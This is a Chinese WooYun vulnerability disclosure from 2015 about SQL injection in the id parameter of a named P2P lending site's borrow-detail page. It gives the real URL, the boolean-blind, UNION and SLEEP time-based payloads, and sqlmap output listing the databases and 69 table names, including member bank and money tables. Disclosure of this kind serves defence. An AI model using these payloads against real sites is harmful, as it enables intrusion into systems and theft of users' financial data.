当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0113998

漏洞标题:财源网主站SQL注入(全站用户信息泄露涉及上亿资金)

相关厂商:财源网

漏洞作者: 90Snake

提交时间:2015-05-14 12:10

修复时间:2015-06-28 12:12

公开时间:2015-06-28 12:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-06-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

金融,P2C

详细说明:

本来的URL做了伪静态是 http://www.cybp2c.com/borrow/detail/id/11
不难看出其原本是这样的http://www.cybp2c.com/borrow/detail?id=11
然后测试 and 1=1 正常
and 1=2 报错了
然后直接上Sqlmap

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=11 AND 7708=7708
Type: UNION query
Title: MySQL UNION query (NULL) - 45 columns
Payload: id=-2913 UNION ALL SELECT 54,54,54,54,54,54,54,54,54,54,54,54,54,54,CONCAT(0x7163727971,0x414b746d6f
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=11 AND SLEEP(5)
---
[22:49:44] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[22:49:44] [INFO] fetching database names
[22:49:44] [INFO] the SQL query used returns 3 entries
[22:49:44] [INFO] resumed: "information_schema","information_schema","informa...
[22:49:44] [INFO] resumed: "test","test","test"
[22:49:44] [INFO] resumed: "wangdai2","wangdai2","wangdai2"
available databases [3]:
[*] information_schema
[*] test
[*] wangdai2


数据在wangdai2这里

漏洞证明:

Database: wangdai2
[69 tables]
+----------------------------+
| lzh_acl |
| lzh_action_log |
| lzh_ad |
| lzh_admin_upload |
| lzh_api_auth |
| lzh_area |
| lzh_article |
| lzh_article_area |
| lzh_article_category |
| lzh_article_category_area |
| lzh_ausers |
| lzh_ausers_log |
| lzh_borrow |
| lzh_borrow_invest |
| lzh_comment |
| lzh_deduct_log |
| lzh_depart |
| lzh_donate |
| lzh_fail_log |
| lzh_feedback |
| lzh_friend |
| lzh_global |
| lzh_inner_msg |
| lzh_invest_instalment |
| lzh_jubao |
| lzh_kvtable |
| lzh_loan_company |
| lzh_member_address |
| lzh_member_apply |
| lzh_member_banks |
| lzh_member_contact_info |
| lzh_member_data_info |
| lzh_member_date |
| lzh_member_department_info |
| lzh_member_ensure_info |
| lzh_member_financial_info |
| lzh_member_friend |
| lzh_member_house_info |
| lzh_member_info |
| lzh_member_levellog |
| lzh_member_limitlog |
| lzh_member_login |
| lzh_member_money |
| lzh_member_moneylog |
| lzh_member_msg |
| lzh_member_payonline |
| lzh_member_recommendlog |
| lzh_member_safequestion |
| lzh_member_status_log |
| lzh_member_withdraw |
| lzh_members |
| lzh_members_status |
| lzh_metal_deal |
| lzh_metal_depart |
| lzh_metal_members |
| lzh_metal_money |
| lzh_metal_outinto |
| lzh_name_apply |
| lzh_oauth |
| lzh_sys_tip |
| lzh_today_reward |
| lzh_verify |
| lzh_video_apply |
| lzh_vip_apply |
| lzh_visit_record_log |
| lzh_workers_depart |
| members |
| rry_members |
| tbl_user_cyb |
+----------------------------+


目测数据肯定在comment
不信你试试?

修复方案:

过滤
求给20rank
PS:告诉你个秘密,好多无量厂商都不知道:评价Rank是不花你钱的哦~

版权声明:转载请注明来源 90Snake@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝